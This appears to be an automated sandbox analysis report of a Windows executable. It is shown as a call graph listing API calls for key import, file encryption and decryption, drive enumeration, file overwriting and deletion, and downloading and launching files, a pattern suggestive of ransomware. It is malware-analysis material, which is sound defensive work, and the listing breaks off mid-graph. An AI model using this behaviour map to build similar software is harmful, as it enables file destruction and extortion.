                                  • Opcode ID: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                  • Instruction ID: 0fb0fd342c264c5c44d83e9ea296aa1d61a1bba0d9bf3c2d8dd8de9c1a89c2df
                                  • Opcode Fuzzy Hash: 8711a656a2e777e653fe97ede956ae059ac7f71f6fefb13965f52b5615085e70
                                  • Instruction Fuzzy Hash: C9210E326043155BC210EF2DEC8096FB3D4EBC4771F910A3FFD64A72D0D639994546A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:12.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:1584
                                  Total number of Limit Nodes:45
                                  execution_graph 4642 401140 #4710 SendMessageA SendMessageA #537 4647 401970 #3092 #6199 #800 4642->4647 4644 401199 SetTimer 4645 4011c3 CreateThread 4644->4645 4646 4011dd 4644->4646 4645->4646 4648 4012d0 4645->4648 4647->4644 4651 4012e0 sprintf sprintf GetFileAttributesA 4648->4651 4652 4013b0 fopen 4651->4652 4653 401350 4651->4653 4655 4012d9 4652->4655 4656 4013ef fread fclose sprintf fopen 4652->4656 4675 404640 InitializeCriticalSection 4653->4675 4656->4655 4658 401471 fread fclose sprintf fopen 4656->4658 4657 401359 4676 4047c0 4657->4676 4658->4655 4659 4014f2 fread fclose 4658->4659 4674 40be90 strncpy strncpy strncpy 4659->4674 4662 401377 4664 401395 DeleteFileA 4662->4664 4665 40137b 4662->4665 4663 401525 4693 40c240 4663->4693 4692 404690 DeleteCriticalSection 4664->4692 4736 404690 DeleteCriticalSection 4665->4736 4669 401575 4669->4655 4735 404640 InitializeCriticalSection 4669->4735 4671 40158c 4672 4047c0 16 API calls 4671->4672 4673 4015ae 4672->4673 4673->4665 4674->4663 4675->4657 4737 4046b0 4676->4737 4678 4048f3 4678->4662 4679 40484e 4679->4678 4742 4049b0 CreateFileA 4679->4742 4681 40486e 4682 4048e5 _local_unwind2 4681->4682 4684 4049b0 7 API calls 4681->4684 4682->4678 4685 40488a 4684->4685 4685->4682 4686 404895 CryptEncrypt 4685->4686 4686->4682 4687 404908 CryptDecrypt 4686->4687 4687->4682 4688 404932 strncmp 4687->4688 4689 404984 4688->4689 4690 40495e _local_unwind2 4688->4690 4751 4049a6 4689->4751 4690->4662 4692->4652 4694 40c25f 4693->4694 4761 40bed0 4694->4761 4696 40c29b 4697 40c2a2 4696->4697 4698 40c2c8 4696->4698 4699 40c2bc 4697->4699 4700 40c2ad SendMessageA 4697->4700 4701 40c2e5 4698->4701 4702 40c2d9 SendMessageA 4698->4702 4705 40dbf0 free 4699->4705 4700->4699 4780 40dc00 4701->4780 4702->4701 4708 40c3d8 4705->4708 4706 40dc00 4 API calls 4707 40c313 4706->4707 4789 40dd00 4707->4789 4708->4669 4711 40dd00 4 API calls 4712 40c335 4711->4712 4713 40dc00 4 API calls 4712->4713 4714 40c350 4713->4714 4715 40dc00 4 API calls 4714->4715 4716 40c36b 4715->4716 4717 40dc00 4 API calls 4716->4717 4718 40c37d 4717->4718 4719 40c3e0 4718->4719 4720 40c3a9 4718->4720 4723 40c3f0 4719->4723 4724 40c3e4 SendMessageA 4719->4724 4721 40c3b9 4720->4721 4722 40c3ad SendMessageA 4720->4722 4792 40dbf0 4721->4792 4722->4721 4725 40c419 4723->4725 4726 40c44d 4723->4726 4724->4723 4728 40c429 4725->4728 4729 40c41d SendMessageA 4725->4729 4730 40c49c 4726->4730 4731 40c45e fopen 4726->4731 4734 40dbf0 free 4728->4734 4729->4728 4730->4699 4732 40c4a0 SendMessageA 4730->4732 4731->4730 4733 40c479 fwrite fclose 4731->4733 4732->4699 4733->4730 4734->4708 4735->4671 4736->4655 4738 4046b7 CryptAcquireContextA 4737->4738 4739 4046e0 4738->4739 4740 4046d7 4738->4740 4739->4679 4740->4738 4741 4046dd 4740->4741 4741->4679 4743 404a1b _local_unwind2 4742->4743 4744 404a09 GetFileSize 4742->4744 4743->4681 4744->4743 4745 404a25 4744->4745 4745->4743 4747 404a38 GlobalAlloc 4745->4747 4747->4743 4748 404a49 ReadFile 4747->4748 4748->4743 4749 404a64 CryptImportKey 4748->4749 4749->4743 4750 404a81 _local_unwind2 4749->4750 4750->4681 4754 404770 4751->4754 4755 404788 4754->4755 4756 40477a CryptDestroyKey 4754->4756 4757 40479d 4755->4757 4758 40478f CryptDestroyKey 4755->4758 4756->4755 4759 4047b4 4757->4759 4760 4047a4 CryptReleaseContext 4757->4760 4758->4757 4759->4678 4760->4759 4762 40bef5 4761->4762 4763 40bf0a #823 4761->4763 4762->4763 4764 40bf2e 4763->4764 4765 40bf27 4763->4765 4767 40bf46 4764->4767 4800 40baf0 4764->4800 4796 40d5e0 4765->4796 4767->4696 4770 40bf72 4770->4696 4771 40bf8a GetComputerNameA GetUserNameA 4772 40dc00 4 API calls 4771->4772 4773 40c013 4772->4773 4774 40dd00 4 API calls 4773->4774 4775 40c01f 4774->4775 4776 40dc00 4 API calls 4775->4776 4777 40c038 4776->4777 4778 40dd00 4 API calls 4777->4778 4779 40c047 4778->4779 4779->4696 4781 40dc15 4780->4781 4787 40c2f8 4780->4787 4782 40dc77 4781->4782 4783 40dc49 4781->4783 4781->4787 5069 412aa0 realloc 4782->5069 5068 412a90 malloc 4783->5068 4786 40dc51 4786->4787 4788 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 4786->4788 4787->4706 4788->4787 4790 40dc00 4 API calls 4789->4790 4791 40c324 4790->4791 4791->4711 4793 40dd70 4792->4793 4794 40dd8b 4793->4794 5070 412ac0 4793->5070 4794->4708 4797 40d602 4796->4797 4832 40dad0 4797->4832 4835 40ba10 4800->4835 4802 40bdf5 4802->4770 4802->4771 4803 40bb14 4803->4802 4804 40bb42 4803->4804 4841 40ba60 4803->4841 4804->4802 4845 40c8f0 #823 4804->4845 4808 40bc1b strtok 4810 40bc30 4808->4810 4824 40bbb7 4808->4824 4809 40ba60 closesocket 4812 40bc8b 4809->4812 4810->4809 4814 40bcec GetTickCount srand 4810->4814 4813 40bc92 4812->4813 4812->4814 4867 40c860 4813->4867 4816 40bdc7 4814->4816 4817 40bd07 rand 4814->4817 4820 40c860 2 API calls 4816->4820 4821 40bd1e 4817->4821 4819 40bcd8 #825 4819->4802 4823 40bde8 #825 4820->4823 4826 40ba60 closesocket 4821->4826 4829 40be11 4821->4829 4873 40ce50 4821->4873 4823->4802 4824->4808 4825 40c7b0 #825 4824->4825 4847 40c7b0 4824->4847 4851 40c920 4824->4851 4863 40c800 #823 4824->4863 4825->4808 4826->4821 4827 40be75 #825 4827->4802 4829->4827 4879 40c740 4829->4879 4833 40d61e 4832->4833 4834 40dadf setsockopt send shutdown closesocket 4832->4834 4833->4764 4834->4833 4836 40ba27 4835->4836 4837 40ba2b 4836->4837 4838 40ba2c 4836->4838 4837->4803 4884 40b840 sprintf GetFileAttributesA 4838->4884 4840 40ba31 4840->4803 4842 40ba88 4841->4842 5004 40d8c0 4842->5004 4846 40bb62 strtok 4845->4846 4846->4810 4846->4824 4848 40c7d0 4847->4848 4849 40c7bb 4847->4849 4848->4824 4849->4848 4850 40c7d6 #825 4849->4850 4850->4848 4852 40c92d ?_Xlen@std@ 4851->4852 4853 40c932 4851->4853 4852->4853 4854 40c973 4853->4854 4855 40c963 4853->4855 4856 40c946 4853->4856 4860 40c990 4854->4860 4861 40c7b0 #825 4854->4861 4857 40c7b0 #825 4855->4857 4858 40c94a 4856->4858 5008 40c9c0 4856->5008 4859 40c96c 4857->4859 4858->4824 4859->4824 4860->4824 4861->4856 4864 40c81f 4863->4864 5014 40cad0 4864->5014 4866 40c844 4866->4824 4868 40c8d9 4867->4868 4872 40c870 4867->4872 4868->4819 4869 40c8ab #825 4870 40c8cc 4869->4870 4869->4872 4870->4819 4871 40c8a2 #825 4871->4869 4872->4869 4872->4871 4874 40ce68 4873->4874 4875 40ce5a 4873->4875 4877 40ce94 #825 4874->4877 4878 40bd9e #825 Sleep 4874->4878 4875->4874 4876 40ce6e #825 4875->4876 4876->4874 4877->4878 4878->4816 4878->4817 4880 40c761 4879->4880 4881 40c77e #825 4879->4881 4882 40c775 #825 4880->4882 4883 40c76f 4880->4883 4881->4829 4882->4881 4883->4881 4885 40b898 4884->4885 4886 40b95b CreateProcessA 4884->4886 4901 40b6a0 CreateDirectoryA 4885->4901 4888 40b9b4 4886->4888 4889 40b9bf WaitForSingleObject 4886->4889 4888->4840 4890 40b9e4 CloseHandle CloseHandle 4889->4890 4891 40b9d8 WaitForSingleObject 4889->4891 4890->4840 4891->4890 4892 40b8a9 4893 40b8e9 sprintf GetFileAttributesA 4892->4893 4915 40b780 CreateDirectoryA 4892->4915 4895 40b946 CopyFileA 4893->4895 4896 40b93b 4893->4896 4895->4886 4896->4840 4897 40b8c1 4897->4893 4898 40b780 60 API calls 4897->4898 4899 40b8d9 4898->4899 4899->4893 4900 40b8e0 4899->4900 4900->4840 4923 412920 4901->4923 4904 40b6d8 DeleteFileA 4904->4892 4905 40b6ec 4926 412940 4905->4926 4907 40b70e 4908 40b719 4907->4908 4909 40b76a 4907->4909 4910 412940 14 API calls 4907->4910 4908->4892 4935 412a00 4909->4935 4913 40b738 sprintf 4910->4913 4912 40b770 4912->4892 4932 4129e0 4913->4932 4916 40b81b 4915->4916 4917 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 4915->4917 4916->4897 4918 40b810 DeleteFileA 4917->4918 4919 40b7f6 4917->4919 4918->4916 4920 40b6a0 54 API calls 4919->4920 4921 40b809 4920->4921 4921->4918 4922 40b827 DeleteFileA 4921->4922 4922->4897 4946 4127e0 #823 4923->4946 4925 40b6cf 4925->4904 4925->4905 4927 412964 4926->4927 4928 412959 4926->4928 4929 412969 4927->4929 4959 411cf0 4927->4959 4928->4907 4929->4907 4931 412982 4931->4907 4992 412990 4932->4992 4934 4129f8 4934->4907 4936 412a15 4935->4936 4937 412a09 4935->4937 4938 412a1a 4936->4938 4998 4127a0 4936->4998 4937->4912 4938->4912 4941 412a7d #825 4941->4912 4942 412a44 #825 4943 412a4d 4942->4943 4944 412a61 #825 4943->4944 4945 412a6a #825 4943->4945 4944->4945 4945->4941 4947 412815 4946->4947 4948 41287a 4946->4948 4947->4948 4949 41283d #823 4947->4949 4950 411c00 15 API calls 4948->4950 4949->4948 4951 41289d 4950->4951 4952 4128a6 4951->4952 4953 4128f8 #823 4951->4953 4954 4128e5 4952->4954 4955 4128b4 #825 4952->4955 4956 4128bd 4952->4956 4953->4925 4954->4925 4955->4956 4957 4128d6 #825 4956->4957 4958 4128cd #825 4956->4958 4957->4954 4958->4957 4960 412231 4959->4960 4961 411d11 4959->4961 4960->4931 4961->4960 4962 411ac0 free free 4961->4962 4965 411d27 4961->4965 4962->4965 4963 411d37 4963->4931 4964 411dc2 4967 411ddc 4964->4967 4968 4113e0 SetFilePointer SetFilePointer ReadFile 4964->4968 4965->4963 4965->4964 4966 411390 SetFilePointer SetFilePointer ReadFile 4965->4966 4966->4964 4969 411350 SetFilePointer SetFilePointer ReadFile 4967->4969 4968->4964 4970 411dfe 4969->4970 4971 411460 SetFilePointer SetFilePointer ReadFile 4970->4971 4972 411e15 4971->4972 4973 411e1c 4972->4973 4974 410a50 SetFilePointer SetFilePointer 4972->4974 4973->4931 4975 411e3e 4974->4975 4976 411e45 4975->4976 4977 411e56 #823 4975->4977 4976->4931 4978 410af0 ReadFile 4977->4978 4979 411e78 4978->4979 4980 411e83 #825 4979->4980 4981 411e9d _mbsstr 4979->4981 4980->4931 4983 411f15 _mbsstr 4981->4983 4983->4981 4984 411f2c _mbsstr 4983->4984 4984->4981 4985 411f43 _mbsstr 4984->4985 4985->4981 4986 411f5a 4985->4986 4987 411b80 SystemTimeToFileTime 4986->4987 4988 412063 LocalFileTimeToFileTime 4987->4988 4991 4120b6 4988->4991 4989 412203 4989->4931 4990 4121fa #825 4990->4989 4991->4989 4991->4990 4993 4129a3 4992->4993 4994 412998 4992->4994 4995 4129a8 4993->4995 4996 412360 28 API calls 4993->4996 4994->4934 4995->4934 4997 4129cf 4996->4997 4997->4934 4999 4127b1 4998->4999 5000 4127a9 4998->5000 5002 4127c7 4999->5002 5003 410f70 CloseHandle #825 free free free 4999->5003 5001 411ac0 free free 5000->5001 5001->4999 5002->4941 5002->4942 5002->4943 5003->5002 5005 40d8ec 5004->5005 5006 40daad closesocket 5005->5006 5007 40baa8 5005->5007 5006->5007 5007->4804 5009 40c9f6 #823 5008->5009 5013 40ca40 5009->5013 5011 40ca81 5011->4860 5012 40ca87 #825 5012->5011 5013->5011 5013->5012 5015 40cbf3 5014->5015 5016 40cb00 5014->5016 5015->4866 5017 40cb26 5016->5017 5023 40cb90 5016->5023 5018 40cb31 5017->5018 5019 40cb2c ?_Xran@std@ 5017->5019 5033 40cd80 5018->5033 5019->5018 5020 40cbe9 5022 40cc60 5 API calls 5020->5022 5022->5015 5023->5020 5025 40cbaa 5023->5025 5024 40cb38 5027 40cb6a 5024->5027 5028 40cb47 memmove 5024->5028 5026 40c7b0 #825 5025->5026 5029 40cbb3 5026->5029 5031 40cd80 4 API calls 5027->5031 5050 40cc60 5028->5050 5029->4866 5032 40cb7d 5031->5032 5032->4866 5034 40cd93 5033->5034 5035 40ce27 5033->5035 5034->5035 5036 40cdd0 5034->5036 5037 40cdc9 ?_Xlen@std@ 5034->5037 5035->5024 5038 40cdf8 5036->5038 5041 40cde2 5036->5041 5037->5036 5039 40ce0a 5038->5039 5040 40cdfc 5038->5040 5039->5035 5046 40c7b0 #825 5039->5046 5042 40c7b0 #825 5040->5042 5043 40cde6 5041->5043 5044 40ce1f 5041->5044 5045 40ce05 5042->5045 5047 40c7b0 #825 5043->5047 5048 40c9c0 2 API calls 5044->5048 5045->5024 5046->5044 5049 40cdf3 5047->5049 5048->5035 5049->5024 5051 40cc73 5050->5051 5052 40cc6e ?_Xlen@std@ 5050->5052 5053 40cd04 5051->5053 5054 40cc88 5051->5054 5055 40ccae 5051->5055 5052->5051 5053->5054 5060 40cd08 5053->5060 5056 40cc90 5054->5056 5059 40c9c0 2 API calls 5054->5059 5058 40ccd9 #825 5055->5058 5062 40ccc4 5055->5062 5056->5027 5057 40cd4c 5063 40c9c0 2 API calls 5057->5063 5058->5062 5059->5056 5060->5056 5060->5057 5061 40cd43 #825 5060->5061 5064 40cd26 5060->5064 5061->5057 5062->5027 5065 40cd5d 5063->5065 5066 40c9c0 2 API calls 5064->5066 5065->5027 5067 40cd3b 5066->5067 5067->5027 5068->4786 5069->4786 5071 412af5 5070->5071 5072 412ac8 free 5070->5072 5071->4794 5072->5071 5630 408c40 5631 408d5c 5630->5631 5633 408c97 5630->5633 5632 408c9d _ftol _ftol 5632->5633 5633->5631 5633->5632 6174 409a40 6178 409d40 6174->6178 6177 409ae7 #2414 #2414 6179 409a87 OffsetRect CreateRectRgn #1641 #5781 6178->6179 6179->6177 6374 409f40 PtVisible 6375 40cf40 6383 40d300 6375->6383 6377 40cf61 6378 40d300 6 API calls 6377->6378 6379 40cf66 6377->6379 6380 40cf87 6378->6380 6381 40d300 6 API calls 6380->6381 6382 40cf8c 6380->6382 6381->6382 6384 40d31f 6383->6384 6385 40d32e 6383->6385 6384->6377 6386 40d339 6385->6386 6387 40d373 time 6385->6387 6389 40d363 6385->6389 6390 40d378 6385->6390 6386->6377 6391 40d493 6387->6391 6392 40d41e 6387->6392 6405 40d2b0 6389->6405 6394 40d3b0 6390->6394 6395 40d380 6390->6395 6396 40d4b1 6391->6396 6401 40d4a8 free 6391->6401 6392->6391 6403 40d487 time 6392->6403 6404 40d469 Sleep 6392->6404 6409 412a90 malloc 6394->6409 6397 40d2b0 memmove 6395->6397 6396->6377 6397->6387 6399 40d3b6 6400 40d3c1 6399->6400 6402 40d2b0 memmove 6399->6402 6400->6377 6401->6396 6402->6387 6403->6391 6403->6392 6404->6392 6406 40d2f5 6405->6406 6407 40d2be 6405->6407 6406->6387 6408 40d2c3 memmove 6407->6408 6408->6406 6408->6408 6409->6399 6183 407650 6184 40765e 6183->6184 6187 407670 6183->6187 6185 4076a0 20 API calls 6184->6185 6188 407665 #2379 6185->6188 6186 407690 #2379 6187->6186 6189 40b620 9 API calls 6187->6189 6190 40768d 6189->6190 6190->6186 5634 404050 #616 5635 404068 5634->5635 5636 40405f #825 5634->5636 5636->5635 6068 404150 6073 404170 #2414 #800 #800 #795 6068->6073 6070 404158 6071 404168 6070->6071 6072 40415f #825 6070->6072 6072->6071 6073->6070 6180 403250 6181 403261 #825 6180->6181 6182 40326a 6180->6182 6181->6182 6191 413254 _exit 6074 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5487 405a60 5534 40b620 FindWindowW 5487->5534 5491 405aab #2514 5557 403f20 #2414 5491->5557 5493 405ae9 5558 403f20 #2414 5493->5558 5495 405b04 5559 403f20 #2414 5495->5559 5497 405b1f 5560 403f20 #2414 5497->5560 5499 405b3f 5561 403f20 #2414 5499->5561 5501 405b5a 5562 403f20 #2414 5501->5562 5503 405b75 5563 403f20 #2414 5503->5563 5505 405b90 5564 403f20 #2414 5505->5564 5507 405bab 5565 403f20 #2414 5507->5565 5509 405bc6 5566 403f20 #2414 5509->5566 5511 405be1 5567 403f20 #2414 5511->5567 5513 405bfc 5568 403f90 #2414 5513->5568 5515 405c10 5569 403f90 #2414 5515->5569 5517 405c24 #800 #800 #800 #800 #781 5570 4050a0 #800 #795 5517->5570 5519 405c9c 5571 4050a0 #800 #795 5519->5571 5521 405cb0 5572 404170 #2414 #800 #800 #795 5521->5572 5523 405cc4 5573 404170 #2414 #800 #800 #795 5523->5573 5525 405cd8 5574 404170 #2414 #800 #800 #795 5525->5574 5527 405cec 5575 404170 #2414 #800 #800 #795 5527->5575 5529 405d00 5576 405d90 #654 #765 5529->5576 5531 405d14 5577 405d90 #654 #765 5531->5577 5533 405d28 #609 #609 #616 #641 5535 40b634 7 API calls 5534->5535 5536 405a8a #1134 #2621 #6438 5534->5536 5535->5536 5537 40b687 ExitProcess 5535->5537 5538 4060e0 #324 #567 #567 #567 5536->5538 5578 4085c0 7 API calls 5538->5578 5540 406162 5541 4085c0 9 API calls 5540->5541 5542 406172 5541->5542 5582 404090 7 API calls 5542->5582 5544 406182 5583 404090 7 API calls 5544->5583 5546 406192 5584 404090 7 API calls 5546->5584 5548 4061a2 5585 404090 7 API calls 5548->5585 5550 4061b2 5586 405000 #567 #540 5550->5586 5552 4061c2 5553 405000 2 API calls 5552->5553 5554 4061d2 #567 #540 #540 #540 #540 5553->5554 5588 407640 5554->5588 5556 4062cb 7 API calls 5556->5491 5557->5493 5558->5495 5559->5497 5560->5499 5561->5501 5562->5503 5563->5505 5564->5507 5565->5509 5566->5511 5567->5513 5568->5515 5569->5517 5570->5519 5571->5521 5572->5523 5573->5525 5574->5527 5575->5529 5576->5531 5577->5533 5579 408660 #6140 5578->5579 5580 408654 5578->5580 5579->5540 5580->5579 5581 40865a GetSysColor 5580->5581 5581->5579 5582->5544 5583->5546 5584->5548 5585->5550 5587 40504a 5586->5587 5587->5552 5588->5556 5608 40db60 send 5609 401760 #6453 5610 401791 WaitForSingleObject TerminateThread CloseHandle 5609->5610 5611 4017b8 5609->5611 5610->5611 5612 40193e 5611->5612 5613 4018f6 5611->5613 5614 4017d8 sprintf fopen 5611->5614 5617 401915 5613->5617 5618 401903 rand 5613->5618 5615 401834 8 API calls 5614->5615 5616 4018da #1200 5614->5616 5615->5612 5616->5612 5617->5612 5619 401939 #1200 5617->5619 5618->5617 5619->5612 5637 403860 SendMessageA 5638 403892 SendMessageA 5637->5638 5639 403883 #1200 5637->5639 5640 4038d1 5638->5640 5641 4038a5 SendMessageA CreateThread 5638->5641 5641->5640 5642 4038e0 5641->5642 5645 4038f0 5642->5645 5644 4038e9 5664 403eb0 6 API calls 5645->5664 5647 403916 SendMessageA 5648 4039e1 5647->5648 5649 403937 SendMessageA 5647->5649 5711 403eb0 6 API calls 5648->5711 5650 403951 5649->5650 5651 403958 5649->5651 5665 403af0 fopen 5650->5665 5682 401e90 5651->5682 5654 4039ea CloseHandle 5654->5644 5656 403961 sprintf 5687 402020 5656->5687 5658 403998 5663 40399c 5658->5663 5696 403a20 5658->5696 5659 4039cd 5704 401f30 5659->5704 5662 4039c8 #1200 5662->5659 5663->5659 5663->5662 5664->5647 5666 403b41 5665->5666 5667 403b28 5665->5667 5668 401e90 InitializeCriticalSection 5666->5668 5667->5651 5669 403b4d 5668->5669 5670 402020 14 API calls 5669->5670 5671 403b67 5670->5671 5672 403b6b 5671->5672 5680 403b9b 5671->5680 5673 401f30 6 API calls 5672->5673 5675 403b82 5673->5675 5674 403c61 fclose 5676 401f30 6 API calls 5674->5676 5675->5651 5678 403c8f 5676->5678 5677 403bb2 fgets 5679 403c5f 5677->5679 5677->5680 5678->5651 5679->5674 5680->5674 5680->5677 5680->5679 5712 402650 MultiByteToWideChar 5680->5712 5804 404640 InitializeCriticalSection 5682->5804 5684 401eb6 5805 404640 InitializeCriticalSection 5684->5805 5686 401ec4 5686->5656 5806 4046f0 5687->5806 5689 402031 5690 402035 5689->5690 5691 402048 GlobalAlloc 5689->5691 5692 4046f0 12 API calls 5689->5692 5690->5658 5693 402061 5691->5693 5694 402066 GlobalAlloc 5691->5694 5692->5691 5693->5658 5695 402079 5694->5695 5695->5658 5697 403a32 GetLogicalDrives 5696->5697 5698 403adc 5696->5698 5702 403a48 5697->5702 5698->5663 5699 403a53 GetDriveTypeW 5701 403a81 GetDiskFreeSpaceExW 5699->5701 5699->5702 5700 403ace 5700->5663 5701->5702 5702->5699 5702->5700 5823 4026b0 5702->5823 5913 401fa0 5704->5913 5706 401f60 5922 404690 DeleteCriticalSection 5706->5922 5708 401f7a 5923 404690 DeleteCriticalSection 5708->5923 5710 401f8a 5710->5648 5711->5654 5715 402560 wcscpy wcsrchr 5712->5715 5714 40269a 5714->5680 5716 4025c9 wcscat 5715->5716 5717 402599 _wcsicmp 5715->5717 5718 4025bd 5716->5718 5717->5718 5719 4025ae _wcsicmp 5717->5719 5728 4020a0 CreateFileW 5718->5728 5719->5716 5719->5718 5721 4025eb 5722 402629 DeleteFileW 5721->5722 5723 4025ef DeleteFileW 5721->5723 5724 402634 5722->5724 5723->5724 5725 4025fa 5723->5725 5724->5714 5726 402617 5725->5726 5727 4025fe MoveFileW 5725->5727 5726->5714 5727->5714 5729 402143 GetFileTime ReadFile 5728->5729 5740 402139 _local_unwind2 5728->5740 5731 40217c 5729->5731 5729->5740 5732 402196 ReadFile 5731->5732 5731->5740 5733 4021b3 5732->5733 5732->5740 5734 4021c3 ReadFile 5733->5734 5733->5740 5735 4021ea ReadFile 5734->5735 5734->5740 5736 402208 ReadFile 5735->5736 5735->5740 5737 402226 5736->5737 5736->5740 5738 402233 CloseHandle CreateFileW 5737->5738 5739 4022f9 CreateFileW 5737->5739 5738->5740 5742 402264 SetFilePointer ReadFile 5738->5742 5739->5740 5741 40232c 5739->5741 5740->5721 5761 404af0 5741->5761 5742->5740 5743 402297 5742->5743 5743->5740 5745 4022a4 SetFilePointer WriteFile 5743->5745 5745->5740 5747 4022ce 5745->5747 5746 40234d 5748 402372 5746->5748 5750 404af0 4 API calls 5746->5750 5747->5740 5749 4022db SetFilePointer SetEndOfFile 5747->5749 5748->5740 5766 40a150 5748->5766 5752 402497 SetFileTime 5749->5752 5750->5748 5753 4024e0 _local_unwind2 5752->5753 5754 4024bc CloseHandle MoveFileW 5752->5754 5753->5721 5754->5753 5755 402477 SetFilePointerEx SetEndOfFile 5755->5752 5757 4023e0 ReadFile 5757->5740 5758 4023a7 5757->5758 5758->5740 5758->5755 5758->5757 5773 40b3c0 5758->5773 5762 404b04 EnterCriticalSection CryptDecrypt 5761->5762 5763 404afc 5761->5763 5764 404b3b LeaveCriticalSection 5762->5764 5765 404b2d LeaveCriticalSection 5762->5765 5763->5746 5764->5746 5765->5746 5767 40a184 5766->5767 5768 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5766->5768 5769 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5767->5769 5770 40a1bd 5767->5770 5768->5767 5769->5770 5771 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5770->5771 5772 40a1f6 5770->5772 5771->5772 5772->5758 5774 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5773->5774 5775 40b3ee 5773->5775 5774->5775 5776 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5775->5776 5784 40b410 5775->5784 5777 40b5ba 5779 40b0c0 4 API calls 5777->5779 5785 402424 WriteFile 5777->5785 5779->5777 5781 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5783 40b4ed 5781->5783 5782 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5782->5777 5783->5777 5783->5782 5783->5785 5792 40adc0 5783->5792 5784->5781 5784->5783 5784->5784 5784->5785 5786 40b0c0 5784->5786 5785->5740 5785->5758 5787 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5786->5787 5788 40b0ee 5786->5788 5787->5788 5791 40b114 5788->5791 5798 40a9d0 5788->5798 5791->5784 5793 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5792->5793 5794 40adee 5792->5794 5793->5794 5795 40ae14 5794->5795 5801 40a610 5794->5801 5795->5783 5799 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5798->5799 5800 40a9ff 5798->5800 5799->5800 5800->5784 5802 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5801->5802 5803 40a63f 5801->5803 5802->5803 5803->5783 5804->5684 5805->5686 5807 4046b0 CryptAcquireContextA 5806->5807 5808 4046f8 5807->5808 5809 404709 5808->5809 5810 4046fc 5808->5810 5812 404711 CryptImportKey 5809->5812 5813 40473e 5809->5813 5811 404770 3 API calls 5810->5811 5815 404703 5811->5815 5816 404760 5812->5816 5817 404731 5812->5817 5814 4049b0 7 API calls 5813->5814 5819 40474c 5814->5819 5815->5689 5816->5689 5818 404770 3 API calls 5817->5818 5820 404738 5818->5820 5819->5816 5821 404770 3 API calls 5819->5821 5820->5689 5822 40475a 5821->5822 5822->5689 5824 40c8f0 #823 5823->5824 5825 4026e4 5824->5825 5826 40c8f0 #823 5825->5826 5827 402706 swprintf FindFirstFileW 5826->5827 5828 40274d 5827->5828 5842 4027b4 5827->5842 5862 402e00 5828->5862 5830 40276a #825 5832 402e00 2 API calls 5830->5832 5831 4027d4 wcscmp 5834 40295d FindNextFileW 5831->5834 5835 4027ee wcscmp 5831->5835 5836 4027a0 #825 5832->5836 5833 402978 FindClose 5840 40298d 5833->5840 5844 4029b9 5833->5844 5834->5833 5834->5842 5835->5834 5837 402808 swprintf GetFileAttributesW 5835->5837 5839 402ace 5836->5839 5841 4028b6 wcscmp 5837->5841 5837->5842 5838 4029ef swprintf DeleteFileW swprintf DeleteFileW 5845 402a6a #825 5838->5845 5846 402a4f 5838->5846 5839->5702 5840->5844 5852 402560 59 API calls 5840->5852 5841->5834 5843 4028d0 wcscmp 5841->5843 5842->5831 5842->5833 5842->5834 5855 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5842->5855 5868 402af0 _wcsnicmp 5842->5868 5843->5834 5848 4028e6 wcscmp 5843->5848 5844->5838 5854 4026b0 84 API calls 5844->5854 5850 402a94 5845->5850 5851 402aba #825 5845->5851 5857 402a66 5846->5857 5894 402e90 5846->5894 5848->5834 5853 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5848->5853 5850->5851 5859 402e90 2 API calls 5850->5859 5851->5839 5852->5840 5856 402da0 8 API calls 5853->5856 5854->5844 5890 402da0 #823 5855->5890 5860 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5856->5860 5857->5845 5859->5850 5860->5834 5863 402e10 5862->5863 5864 402e7a 5862->5864 5865 402e4c #825 5863->5865 5866 402e40 #825 5863->5866 5864->5830 5865->5863 5867 402e6d 5865->5867 5866->5865 5867->5830 5869 402b12 wcsstr 5868->5869 5870 402b1f 5868->5870 5869->5870 5871 402b30 _wcsicmp 5870->5871 5872 402be9 _wcsicmp 5870->5872 5873 402b42 5871->5873 5874 402b4d _wcsicmp 5871->5874 5875 402c07 _wcsicmp 5872->5875 5876 402bfc 5872->5876 5873->5842 5879 402b67 _wcsicmp 5874->5879 5880 402b5c 5874->5880 5877 402c21 _wcsicmp 5875->5877 5878 402c16 5875->5878 5876->5842 5877->5842 5878->5842 5881 402b81 _wcsicmp 5879->5881 5882 402b76 5879->5882 5880->5842 5883 402b90 5881->5883 5884 402b9b _wcsicmp 5881->5884 5882->5842 5883->5842 5885 402bb5 wcsstr 5884->5885 5886 402baa 5884->5886 5887 402bc4 5885->5887 5888 402bcf wcsstr 5885->5888 5886->5842 5887->5842 5888->5872 5889 402bde 5888->5889 5889->5842 5891 402dbf 5890->5891 5899 402f10 5891->5899 5893 402de4 5893->5860 5895 402ed0 #825 5894->5895 5896 402eb1 5894->5896 5895->5846 5897 402ec4 #825 5896->5897 5898 402ebd 5896->5898 5897->5895 5898->5895 5900 402f40 5899->5900 5907 403044 5899->5907 5901 402f68 5900->5901 5906 402fdb 5900->5906 5903 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5901->5903 5904 402f6e ?_Xran@std@ 5901->5904 5902 